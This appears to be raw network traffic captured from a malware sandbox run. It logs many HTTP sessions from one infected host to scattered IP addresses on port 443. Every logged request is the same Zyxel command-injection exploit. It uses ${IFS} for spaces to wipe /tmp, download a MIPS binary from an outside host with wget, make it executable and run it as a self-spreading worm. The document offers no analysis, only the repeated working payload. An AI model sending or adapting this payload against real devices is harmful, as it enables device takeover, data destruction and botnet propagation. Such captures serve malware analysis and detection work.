                                        Mar 31, 2024 09:22:39.825458050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8948192.168.2.2339508175.56.73.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825524092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8949192.168.2.2345342133.159.130.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825556993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8950192.168.2.2349930153.163.178.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825609922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8951192.168.2.235372694.14.50.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825643063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8952192.168.2.2349754210.223.159.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825695992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8953192.168.2.233912636.227.64.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825747013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8954192.168.2.235871685.109.122.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825798988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8955192.168.2.234967813.162.112.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825855017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8956192.168.2.2357706101.198.48.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825897932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8957192.168.2.2358460209.233.112.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825954914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8958192.168.2.2358832101.178.74.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825993061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8959192.168.2.236042879.112.204.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826050043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8960192.168.2.2336730138.242.86.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826087952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8961192.168.2.234590485.203.19.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826138020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8962192.168.2.2351418188.238.187.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826158047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8963192.168.2.2360320181.124.176.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826211929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8964192.168.2.234498070.217.77.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826251030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8965192.168.2.234399242.99.220.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826298952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8966192.168.2.2336744102.190.76.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826354027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8967192.168.2.2349130184.242.29.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826386929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8968192.168.2.23426229.28.203.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826426029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8969192.168.2.2340366108.156.9.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826458931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8970192.168.2.234821261.152.122.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826528072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8971192.168.2.2354830213.208.149.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826555967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8972192.168.2.2356400176.158.86.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826602936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8973192.168.2.234273881.19.170.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826632977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8974192.168.2.2341014158.9.216.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826690912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8975192.168.2.233968042.217.81.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826744080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8976192.168.2.23566621.239.188.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826778889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8977192.168.2.2334152154.214.218.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826831102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8978192.168.2.2347854137.67.25.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826869011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8979192.168.2.235203471.6.199.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826915026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8980192.168.2.2333390113.49.207.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.826967001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8981192.168.2.2351240133.127.171.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827001095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8982192.168.2.2335162104.177.17.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827058077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8983192.168.2.2333786176.221.22.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827090979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8984192.168.2.234126266.224.44.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827140093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8985192.168.2.235282425.101.40.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827192068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8986192.168.2.2339568129.79.124.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827239037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8987192.168.2.234497689.67.18.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827281952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8988192.168.2.2338360108.182.48.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827325106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8989192.168.2.2340162122.185.132.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827373028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8990192.168.2.233924269.46.70.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827430010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8991192.168.2.233365071.109.62.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827478886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8992192.168.2.2335532187.213.39.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827508926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8993192.168.2.234339476.112.130.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827578068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8994192.168.2.235834264.236.95.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827611923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8995192.168.2.234303636.164.188.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827661037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8996192.168.2.2356276210.10.148.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827697992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8997192.168.2.236030032.160.226.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827725887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8998192.168.2.2353012140.79.99.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827778101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8999192.168.2.235442658.231.149.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827835083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9000192.168.2.2341722135.158.21.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827856064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9001192.168.2.236022666.42.208.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827915907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9002192.168.2.235840839.54.81.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.827959061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9003192.168.2.2345424194.125.252.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828016043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9004192.168.2.2336670112.76.19.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828051090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9005192.168.2.235686872.181.237.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828100920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9006192.168.2.233824068.108.19.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828124046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9007192.168.2.2351118174.99.221.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828190088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9008192.168.2.2350820110.124.144.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828226089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9009192.168.2.2347998160.63.83.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.828270912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9010192.168.2.2333860213.21.144.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834677935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9011192.168.2.2342754101.178.57.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834707975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9012192.168.2.234153441.69.249.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834739923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9013192.168.2.2342514161.60.82.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834788084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9014192.168.2.2349552132.59.158.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834815979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9015192.168.2.235301844.26.7.113443
                                        TimestampBytes transferredDirectionData
